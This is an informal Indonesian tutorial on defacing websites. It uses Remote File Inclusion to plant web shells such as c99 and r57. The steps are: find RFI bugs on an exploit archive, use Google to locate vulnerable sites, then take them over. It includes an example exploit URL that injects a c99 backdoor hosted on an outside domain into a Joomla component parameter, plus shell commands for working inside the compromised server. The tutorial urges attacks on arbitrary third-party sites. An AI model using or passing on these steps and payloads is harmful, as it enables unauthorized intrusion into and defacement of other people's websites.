deface...deface...deface...okelah kalo beg..beg...
sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
4. ekin0x
5. locus7
bagamana mencarinya backdoor tersebut, kita cari melalui google
lagi-lagi intro nih, yups betul, agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2...........
AMIEN !!!
=======
KEDUA
=======
ok setelah kita bedoa, bukalah www.milw0rm.com atw site ygmenyediakan RFI
kemudian klik search
kemudian tulislah RFI
========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]
========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt??
========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda...
perintah yang berguna saat melakukan aktivitas backdooring:
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
